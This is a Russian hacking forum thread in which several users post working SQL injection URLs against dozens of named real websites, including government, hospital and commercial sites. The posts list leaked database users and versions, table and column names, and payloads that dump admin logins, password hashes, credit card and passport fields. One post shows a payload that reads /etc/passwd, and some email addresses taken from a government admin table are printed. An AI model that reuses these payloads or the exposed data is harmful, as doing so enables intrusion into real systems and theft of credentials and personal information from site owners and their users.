Просмотр полной версии : SQL Инъекции
mailbrush
16.11.2009, 22:18
http://www.artero.ru/album.php?p=1&n=530)+and+null+union+select+1,2,3,concat_ws(0x3a, user(),database(),version()),5,6,7,8,9%23
db0743811@10.0.0.33:db0743811:5.0.51a
esamiafrica@localhost:4.1.20:esamiafrica_site
http://www.esami-africa.org/research.php?id=-61+union+select+concat_ws(0x3a,id,username,pword)+ from+admin--
Жаль хэшык неразбрутил(... кому удастся отпишитесь плиз....
http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+inf ormation_schema.columns+where+table_name=0x6c61626 76561725f
labgear_users::users_id:users_name:users_pass
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,users_i d,users_name,users_pass),2+from+labgear_users
________
http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+inf ormation_schema.columns+where+table_name=0x7068706 2625f7573657273
phpbb_users::user_id:username:user_password
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,user_id ,username,user_password),2+from+phpbb_users
MySQL 5.0.77-log
выводит все строки сразу
1. http://www.thestream.tv/series.php?s=-1+and+1=0+union+select+1,2,3,4,5,table_name,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +from+information_schema.tables--+-
2. и намного более извращённый вариант, но интересный =)
инъект в 18 поле инъекта.
разделитель - %0А - перевод строки
2
union
select
1,2,table_name,4,5,6,7,8,9,10
from
information_schema.tables
#
в hex.
вывод information_schema
http://www.thestream.tv/watch.php?v=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,0x320A756E696F6E0A73656C6563740A312C322C746 1626C655F6E616D652C342C352C362C372C382C392C31300A6 6726F6D0A696E666F726D6174696F6E5F736368656D612E746 1626C65730A23,19,20,21,22,23,24,25,26--+-
152 колонки :)
PR5 тИЦ40
http://www.skbcases.com/music/products/proddetail.php?c=85&id=431+and+1=0+union+select+1,2,3,4,5,concat_ws(0x 3a,version(),user(),database()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 ,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,9 7,98,99,100,101,102,103,104,105,106,107,108,109,11 0,111,112,113,114,115,116,117,118,119,120,121,122, 123,124,125,126,127,128,129,130,131,132,133,134,13 5,136,137,138,139,140,141,142,143,144,145,146,147, 148,149,150,151,152--
4.0.12-standard-log:skbcases@localhost:skbcases
http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,column_name,3+from+informatio n_schema.columns+where+table_name=0x61646d696e
admin::login,password,work
MySQL 5.0.51a-24+lenny1-log
http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,concat_ws(0x3a,login,password ,work),3+from+admin
yizkor.nypl.org
Вашему вниманию предлагаю базу данных Оракул! :)
http://yizkor.nypl.org/index.php?id=-1158+union+select+null,user,null,null,null,null,nu ll,null,null,null,null,null+from+sys.dual+--+
User: YIZKOR
Удалось вывести парочку таблиц:
NYPL_YIZKOR_BOOKS
DUAL
DEF$_TEMP$LOB
http://yizkor.nypl.org/index.php?id=-1158+union+select+null,table_name,null,null,null,n ull,null,null,null,null,null,null+from+sys.all_tab les+where+rownum+<=+5+--+
P.S. Вывод данных осуществляется в столбик, который к сожалению визуально не видно. Но по скольку мы крутые ребята, то открываем исходник. Находим строку var catnyp_id = ""; на первой же странице, листать далеко не надо. Именно между кавычек и осуществляется вывод информации ;) Вот так вот.
PR4
http://www.managingmoney.com/lc_card_main.php?id=-100552720/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105/*
4.1.22-standard-log:cardoffers:creditcards@208.53.48.144
PR4
http://www.thealbany.org.uk/whatson_music_detail.php?ID=-344/**/union/**/select/**/1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9, 10,11,12,13,14,15,16/**/from/**/members--+
5.0.77-log:so_uk_net@195.8.80.50:so_uk_net
waterandclimate.org
http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,concat(version(),0x3A3A,user (),0x3A3A,database()),5,6,7,8,9,10,11+--+
Version: 5.0.21-community
User: WaterAndClimate@dc.ihe.nl
Database: wac
OS: Win32
Таблицы:
http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,table_name,5,6,7,8,9,10,11+f rom+information_schema.tables+limit+0,1+--+
Присутствует таблица members:
mid
fname
lname
organization
country
Но к сожалению в ней особо ничего полезного нету.
PR6
http://www.artidea.org/event.php?id=999+union+select+1,2,3,4,version%28%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
System information:
-----------------------------------------
basedir:/usr/
base:artidea_db1
user:ai_db_user@localhost
os:redhat-linux-gnu
ver:5.0.45
datadir:/var/lib/mysql/
tmpdir:/tmp/
[ username,password,id ] from [ artidea_db1.admin_users ]
-----------------------------------------
Сорри.. Больше так не буду )
http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name )+from+information_schema.columns+where+table_name =0x7573657273
users::username,password,userid,userlevel,email,ti mestamp
http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,username,0x 3a,password,0x3a,email,0x3a,userlevel)+from+users
MySQL 5.0.51b-community-nt
admin panel: http://www.barnstablecounty.org/admin.php
================================================== =============
MySQL 5.0.81-community-log
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4+from+information_schema.columns+where+table_name =0x6372656469745f7573657273
credit_users::id:user_mail:user_pass:passport_numb er:passport_series
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user_ mail,0x3a,user_pass,0x3a,passport_number,0x3a,pass port_series),4+from+credit_users
http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,user_ id,username,userpass))),2,3,4,5,6+from+poll_user--
http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,a_log in,a_pass,a_surname,a_name))),2,3,4,5,6+from+admer--
semiramidasales.com
http://semiramidasales.com/borovets/gallery_view.php?gallery_id=5+union+all+select+1,c oncat_ws%280x3a,version%28%29,database%28%29,user% 28%29%29,3,4--
Version: 5.0.77
User: semiramidasales@localhost
Database: semiramidasales
automaticgates.co.uk
http://www.automaticgates.co.uk/gallery_view.php?gallery_id=-99999+union+all+select+1,concat_ws%280x3a,version% 28%29,database%28%29,user%28%29%29,3,4,5--
Version: 5.0.81-community
User: rogerw_agssite@localhost
Database: rogerw_ags
Twin $park
21.11.2009, 03:03
PG SQL
http://www.agetop.go.gov.br/index.php?idMateria=1+and+1=version()::int
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6
hack-win32
21.11.2009, 16:51
u70375524@cgihost:d60343682:5.0.77-log
http://curlingwarmers.com/view_product.php?id=-24+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10,11,12,13,14,15--
dearpret_blog@localhost:dearpret_dearpretty:5.0.81-community
http://www.dearpretty.com/view_product.php?id=-29+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12--
alcolor_gvam@localhost:alcolor_alcolor:4.1.22-standard-log
http://www.alcolor.com/view_product.php?pid=4&id=-15+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8--
jhatsdbadmin@lsh1006.lsh.chicago.hostway:jhatsprod db:5.0.32-Debian_7etch6-log
http://jhats.com/view_product.php?prod_id=-105+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38--
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7765625f7573657273--
web_users::id:ime:prezime:adresa:zemlja:email:br_k reditne:telefon:aktivan:password:username:rabat:zi p:mjesto
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,ime,0x3a,adre sa,0x3a,zemlja,0x3a,email,0x3a,br_kreditne,0x3a,te lefon,0x3a,aktivan,0x3a,password,0x3a,username,0x3 a,rabat,0x3a,zip,0x3a,mjesto),4,5,6,7+from+web_use rs
__________________________________________________ ______
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7573657273--
users::id:username:password:pwd_token:admin:name:l astname:privs:email
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,usern ame,0x3a,password,0x3a,admin,0x3a,email),4,5,6,7+f rom+users
admin panel: http://www.aura-maris.com/admin/
MySQL 5.0.81-community-log
EndLeSSDre@M
22.11.2009, 00:50
www.fishcom.ru
http://www.fishcom.ru/page.php?r=35'+union+select+1,2,3,4,5,6,concat_ws( 0x20,user_login,user_password),8,9,10,11,12,13,14+ from+cms_users/*
fox_malder
22.11.2009, 01:03
http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,DATABAS E(),4,5,6,7,8+--+
cida_ge
http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,VERSION (),4,5,6,7,8+--+
5.0.51-log
http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,USER(), 4,5,6,7,8+--+
cida_ge@localhost
http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,table_n ame,4,5,6,7,8+from+information_schema.tables+limit +42,1+--+
user
http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,passwd, 4,5,name,7,8+from+user+--+
http://www.mss.gov.si/si/okroznice_razpisi_in_javna_narocila/javni_razpisi/?tx_t3javnirazpis_pi1%5Bshow_single%5D=1028+UNION+ SELECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYP T(CONCAT_WS(0x3a,Version(),Database(),User()),0x71 ),0x71),12,13,14,15,16,17,18,19,20--
Database Version: 4.1.10a
Database name: mss
User name: mss@localhost
http://www.bolnisnica-po.si/index.php?id=110+UNION+SELECT+1,2,3,4,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),6+LIMIT+1,1--
Database Version: 4.1.15-Debian_1ubuntu5-log
Database name: gigaspark2_bolnica
User name: bolnica_user@localhost
http://www.ccp.si/izpis.php?id=586+UNION+SELECT+1,2,3,4,5,6,7,8,AES_ DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Datab ase(),User()),0x71),0x71),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26+LIMIT+1,1--
Database Version: 5.0.51a-24+lenny1-log
Database name: ccp
User name: ccp@localhost
fox_malder
22.11.2009, 12:37
http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,DATABASE(),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17+--+
ultimate
http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,VERSION(),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--+
5.0.84-log
http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,USER(),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17+--+
root@localhost
http://www.vip-clinic.by/site/news.php?ID=-10+union+select+1,2,3,4,group_concat(table_name)+f rom+information_schema.tables--
ТИЦ: 10
PR: 5
biokmetijazel-puksic.si
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(version (),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6, 7,8,9,10,11,12+--+
Version: 5.0.45-log
User: biokmetijazel@localhost
Database: biokmetijazel
OS: Linux
Base dir: /usr/
Data dir: /var/lib/mysql/
Tmp dir: /tmp/
Таблицы:
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,table_name,3,4 ,5,6,7,8,9,10,11,12+from+information_schema.tables +limit+0,1+--+
1. phplist_admin:
id
loginname
namelc
email
created
modified
modifiedby
password
passwordchanged
superuser
disabled
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(loginna me,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phpl ist_admin+limit+0,1+--+
2. users:
username
ime
password
userid
userlevel
email
timestamp
potrditev
datum
mailp
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(usernam e,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phpli st_admin+limit+0,1+--+
fox_malder
22.11.2009, 21:13
http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46--
http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,DATABASE(),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46--
bienvenueapariscom
http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,VERSION(),US ER(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46--
5.0.67-log
flocmagny@imu176.infomaniak.ch
http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,login,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46+from+phpmv_users--
дальше не стал
http://www.lademence.be/pages/commentaires/news.php?action=affiche_commentaires&id=-26+union+select+1,2,unhex(hex(concat_ws(0x3a,user_ id,user_level,user_pwd,user_nom,user_prenom,user_p seudo,user_email,user_post_format,user_edit_size,u ser_pref_cat,user_lang,user_delta,user_post_pub))) ,4+from+dc_user--
d-poljane.lj.edus.si
http://www.d-poljane.lj.edus.si/klepetalnica/detail.php?pid=-100+union+select+1,convert(concat(user(),0x3A,vers ion(),0x3A,database()),binary),3,4,5,6,7,8,9,10,11 ,12+--+
Version: 4.1.14
User: dd-poljane@localhost
Database: ddp
OS: portbld-freebsd 4.8
to Gaus
http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws( 0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admi n--
5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews
Там есть еще данные форума
[ username,password ] from [gamerevi_gamenews.pubb2_users ]
Скандинавские аукционы - дырявый движок, 3 скули для примера
lockemout.com
http://lockemout.com/productdetails.php?pid=3&aid=448+union+all+select+1,2,3,4,5,6,7,8,concat_ws %280x3a,version%28%29,database%28%29,user%28%29%29 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 ,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83--
5.0.81-community:lmocom_bd:lmocom_bdu@localhost
biddango.com
http://biddango.com/productdetails.php?pid=10&aid=-9999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83--
5.0.85-community:biddango_auction:biddango_admin@localhos t
yayabids.com
http://yayabids.com/productdetails.php?pid=4&aid=-9999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88,89,90,91,92--
5.0.81-community:yayabids_yaya:yayabids_yaya@localhost
blueprintskateboards.com
http://www.blueprintskateboards.com/news.php?id=-1110+UNION+SELECT+1,concat(version(),0x3a,0x3a,use r(),0x3a,0x3a,database())
,3,4,5,6+--+
Version: 4.1.20
User: blueprint@localhost
Database: blueprint
OS: Linux
finishing-blasting.com
http://www.finishing-blasting.com/news.php?id=-114+UNION+SELECT+1,2,concat(version(),0x3a,0x3a,us er(),0x3a,0x3a,database()),4+--+
Version: 4.1.22-max-log
User: finishingblast@68.178.254.191
Database: finishingblast
OS: Linux
todaysgrocery.com
http://www.todaysgrocery.com/news.php?id=-0045+UNION+SELECT+1,2,concat(version(),0x3a,0x3a,u ser(),0x3a,0x3a,database()),4+--+
Version: 4.1.22-standard
User: graphici_admin@localhost
Database: graphici_grocery
OS: Linux
geogen.ge
http://www.geogen.ge/index.php?id_menu=51&id_menu_up=&lang=&abc=1&id_let=2+union+all+select+1,2,3,4,concat_ws%280x3a ,version%28%29,database%28%29,user%28%29%29,6,7--
5.0.81-community-log:geogenge_geo:geogenge@localhost
DezMond™
25.11.2009, 18:43
http://www.radiochango.com/catala/foros/missatges.php?ID=207&IDM=131265+uNiOn+sElEct+1,concat_ws(0x3a3a,VCH_log in,VCH_password),3+from+rc_usuarios+--+
http://seosamhgriangraf.com/texts.php?menu_id=-3+uNiOn+sElEct+1+--+&menu_order=4
http://islandtripper.com/islands.php?id=-2+union+select+1,2,3,4+--+
http://ijpr.iut.ac.ir/magazine.php?magazine=ijpr+union+select+1,file_pri v,3,4+from+mysql.user+--+
http://www.wjxz.com/view.php?id=-502+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
http://capeclearislandferry.com/texts.php?menu_id=-16+union+select+concat_ws(0x3a3a,user_name,passwor d)+from+control_user+--+&menu_order=5'
http://www.pvpubs.com/magazine.php?id=-1+union+select+concat_Ws(0x3a3a,username,password) +from+user+--+
http://www.witec.de/en/company/witecnews/news.php?id=-25+union+select+1,2,concat_ws(0x3a,user(),version( ),database,@@version_compile_os),4,5,6--
user:d004aa52@localhost
version:5.0.45-community-log
database:d004aa52
OS:pc-linux-gnu
hack-win32
26.11.2009, 20:23
gymsite@localhost:globalso_gymcan:5.0.67-community
http://www.gymcan.org/site/news.php?id=-118+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13,14,15--
dbo39874005@localhost:db39874005:4.0.27-standard
http://www.iwr.de/news.php?id=-13392+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,database(),version()),7--
dbo251077112@212.227.127.134:db251077112:4.0.27-max-log
http://www.atomicforce.de/News.php?ID=-47+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5--
dbo161593295@localhost:db161593295:4.0.27-standard
http://www.busplaner.de/nachricht/news.php?id=-59708+union+select+concat_ws(0x3a,user(),database( ),version()),2,3,4,5,6--
http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+concat_ws(0x3a,user,password,file_p riv,0x3a,host)+from+mysql.user
root:[censored]:Y:localhost
MySQL 4.1.20-log
http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+load_file('/etc/passwd') - чтение файлов на сервере
если напрячься и раскрыть пути, то и outfile прокатит
http://www.ppngo.org
http://www.ppngo.org/news.php?page=1&new=-41+union+select+1,2,convert(concat(login,0x3A,pass wd,0x3A,email),binary),4,5,6,7,8,9,10,11,12+from+u sers+limit+0,1--
http://www.ppngo.org/news.php?page=1&new=-41+union+select+1,2,3,4,5,6,concat_ws(char(58),TAB LE_SCHEMA,TABLE_NAME,COLUMN_NAME),8,9,10,11,12+fro m+INFORMATION_SCHEMA.COLUMNS+limit+362,1--
fox_malder
27.11.2009, 22:39
http://www.windbrake.us/news.php?ID=-823+and+0+union+select+1,concat_ws(0x3a,user(),dat abase(%20%20),version()),3,4,5,6+--+
user - brake@trinity.kiva.net
database - cibf
version - 5.0.26
Strilo4ka
28.11.2009, 18:55
http://www.ses.gov.ua/?cont=9&news=8&idr=99999999999999'+union+select+1,concat_ws(0x3a, version(),user(),database(),@@version_compile_os)+ from+information_schema
офiцiйну сторiнка Державної санiтарно-епiдемiологiчної служби м. Києва
версия: 5.0.76
пользователь: sim3_db6@88.214.192.26
БД:sim3_db6
ОС:unknown-linux-gnu
PostgreSQL
фонд державного майна Украины
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+1,2,3,4,5--+&noanons=noanons&all_news=&page=
имя базы данных: spfu_2
версия: PostgreSQL 8.0.8 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
пользователь spfu
узнаем другие базы
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,datname,null,datname,null+f rom+pg_database%20limit+1+offset+1--+&noanons=noanons&all_news=&page=
перебирал параметром оффсет:
spfu_2
template0
template1
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,table_name,null,null,null+f rom+information_schema.tables+limit+1+offset+0--+&noanons=noanons&all_news=&page=
таблицы
admin
answer
applicable_roles
article
check_constraints
circulate_history
...
узнаем колонки
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,column_name,null,null,null+ from+information_schema.columns+where+table_name=$ $admin$$+limit+1+offset+0--+&noanons=noanons&all_news=&page=
с $$ потому что кавыяка не проходит
надо сразу с типами
атрибуты admin:
email
id
inet_request
name
pr
ящики
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,email,null,null,null+from+a dmin+limit+1+offset+0--+&noanons=noanons&all_news=&page=
_no_spam_natalik@ukr.net(Наташа (личный)
_no_spam_press@spfu.gov.ua(Наташа
askh@ukr.net(Олександр Степанович
kroshka@spfu.gov.ua(з приводу плати за оренду майна
marketing@spfu.gov.ua(Департамент маркетингу ФДМУ
rproekt@i.kiev.ua(Радіопроект
http://www.belaruslift.com/news.php?id=-23+union+select+1,group_concat(0x3a,login,password ),3,4+from+admins--
http://www.trkvolgamoll.ru/news.php?id=-23+union+select+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://www.e-portal.com.ua/news.php?id=-23+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13+from+information_schema.tables--
http://www.garylefevre.com/portfolio/portfolio.php?id=9+union+select+1,concat_ws(0x3a,u ser(),version(),database(),@@version_compile_os),3 ,4,5,6,7,8,9
user:dbo238807836@212.227.29.59
version:5.0.81-log
database:db238807836
OS:pc-linux-gnu
-1-
target : hana-g.com
Exploit: http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,null,2,3,4--
Database : d031f18ydb1
User : d031f18y@localhost
Version : 5.1.36-community-log
Contain :
[0]area: area_id,area_name,order,enabled,upd_date,ins_date
[1]card_data: cdat_id,ctyp_id,prg_id,cnt_id,id,password,price,po int,flag,insert_time,use_time,card_number,etc,env
[2]card_price: prg_id,ctyp_id,price,enabled
[3]card_type: ctyp_id,ctyp_name,sname,chr,chr2,order,enabled,upd _date,ins_date
[4]ccheck_sid: sid,prg_id,cnt_id,price,card_number,time
[5]center: cnt_id,prg_id,cnt_name,alph_name,area_id,order,ena bled,tel,bank1,bank2,bank3,bank4,credit_val_zero,c redit_val_mobile,upd_date,ins_date,abt_cnt_id
[6]prefecture: id,name
[7]pricashop: htencd,htenko,prefecture,city,shopname,tel,town,ad dress,route,opens,closes,holiday,hanaf,hitof,manif ,purf,adry
[8]pricashop_old: htencd,htenko,prefecture,city,shopname,tel,town,ad dress,route,opens,closes,holiday,hanaf,hitof,manif ,purf,adry
[9]program: prg_id,prg_name,sname,sname2,order,man_info,woman_ info,woman_minfo,enabled,upd_date,ins_date,abt_prg _id
[10]rog: rogid,rognm,rog1,rog2,insdt,upddt
[11]settings: key,value
Example:
http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,concat(cdat,0x3a,ct yp_id,0x3a,id,0x3a,password),2,3,4+from+card_data--
-2-
target : www.goldpoint.com.ar
Exploit: http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26--
Database : ingelec_mailing
User : ingelec@localhost
Version : 5.0.85-community
Contain :
[0]news_emails: email_id,email_title,email_subject,email_body,emai l_identity
[1]news_files: file_id,file_newsletter,file_file
[2]news_groups: group_id,group_code,group_title,group_identity,gro up_date,group_description,group_system,group_publi c
[3]news_history: history_id,history_newsletter,history_user,history _name,history_email,history_status,history_date,hi story_group
[4]news_identities: person_id,person_name,person_email,person_signatur e,person_signature_html,person_phone,person_protec t
[5]news_newsletters: newsletter_id,newsletter_code,newsletter_problem,n ewsletter_group,newsletter_title,newsletter_date,n ewsletter_body_txt,newsletter_body_html,newsletter _sent,newsletter_overwrite,newsletter_signature,ne wsletter_from,newsletter_from_name,newsletter_misc _history,newsletter_misc_identity2,newsletter_misc _signature
[6]news_users: user_id,user_status,user_confirm,user_group,user_d ate,user_name,user_email,user_type,user_company,us er_address,user_city,user_state,user_zip,user_coun try,user_phone,user_fax,user_site,user_im_yahoo,us er_im_msn,user_im_icq,user_im_aol,last_name,referr er,level
[7]news_vars: name,value
[8]site_mb_msg: msg_id,msg_type,msg_user,msg_date,msg_title,msg_fr om,msg_to,msg_body,msg_new,msg_delete
[9]site_user_notes: note_id,note_title,note_body,note_relation,note_ty pe,note_post_date,note_post_ip,note_post_user
[10]site_users: user_id,user_login,user_password,user_name,user_ad dress,user_city,user_state,user_zip,user_country,u ser_phone,user_email,user_email2,user_im_aol,user_ im_icq,user_im_msn,user_im_yahoo,user_im_other,use r_status,user_level,user_pending,user_date,last_lo gin,last_ip,user_msg_send,user_msg_subject,user_pr otect_delete,user_protect_edit,user_group,user_rol e
[11]site_vars: id,name,value
Example:
http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(user_login,0x3a,user_password),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26+from+ingelec_mailing.site_users--
-3-
target : www.vivliokritiki.gr
Exploit: www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,null,2,3,4,5 ,6,7,8,9,10,11--
Database : vivlio
User : vivliokritiki@cgi0506.int.bizland.net
Version : 5.0.83-log
Contain :
[0]administrator: name,password
[1]author: id,fname,lname
[2]authorTitle: id,tid,aid
[3]category: id,name
[4]comments: id,tid,name,email,postdate,comments
[5]guestBook: id,name,email,postdate,comments
[6]publisher: id,house,address
[7]publisherTitle: id,pid,tid,pdate,price,pages
[8]title: id,cid,name,review,subtitle,reviewer
[9]users: id,fname,lname,email,password,comments
[10]verification: id,value
Example:
http://www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,concat(name, 0x3a,password),2,3,4,5,6,7,8,9,10,11+from+administ rator--
-4-
target : www.hemasolutions.com
Exploit: http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,null,2,3,4, 5,6,7,8,9--
Databases :
hemasol_acc
hemasol_balkan
hemasol_balkanforum
hemasol_calculators
hemasol_hema
hemasol_leather
hemasol_mall
hemasol_vioenergy
hemasol_viva
hemasol_widget
User : hemasol@localhost
Version : 5.0.81-community-log
Contain (hemasol_hema) :
[0]downloaded: downloaded_id,downloaded_date,downloaded_file,down loaded_ip
[1]downloads: downloads_id,downloads_name,downloads_lang,downloa ds_version,downloads_date,downloads_av,downloads_s rc,downloads_file,downloads_ext
[2]faqs: faqs_id,faqs_date,faqs_question,faqs_answer
[3]news: news_id,news_date,news_head,news_body,news_image,n ews_image_ext,news_lang
[4]plans: plans_id,plans_owner,plans_template,plans_src,plan s_date,plans_disp_style
[5]pools: pools_id,pools_date,pools_ip,pools_q1,pools_a1,poo ls_q2,pools_a2,pools_q3,pools_a3
[6]queries: queries_id,queries_owner,queries_date,queries_temp late,queries_args,queries_result
[7]questions: questions_id,questions_name,questions_email,questi ons_date,questions_topic,questions_text
[8]requests: requests_id,requests_date,requests_name1,requests_ name2,requests_title,requests_email,requests_compa ny,requests_address,requests_city,requests_state,r equests_post,requests_country,requests_page,reques ts_info
[9]reviews: reviews_id,reviews_date,reviews_head,reviews_body, reviews_lang,reviews_author,reviews_email,reviews_ rating,reviews_approved,reviews_company
[10]templates: templates_id,templates_name,templates_lang,templat es_group,templates_owner,templates_email,templates _xml,templates_creation,templates_used,templates_a ctive
[11]users: users_id,users_name,users_pass,users_desc,users_co untry,users_city,users_address,users_tel,users_ema il,users_website,users_ip,users_lang,users_plans_l eft,users_download_allowed,users_created,users_act ive,users_agree
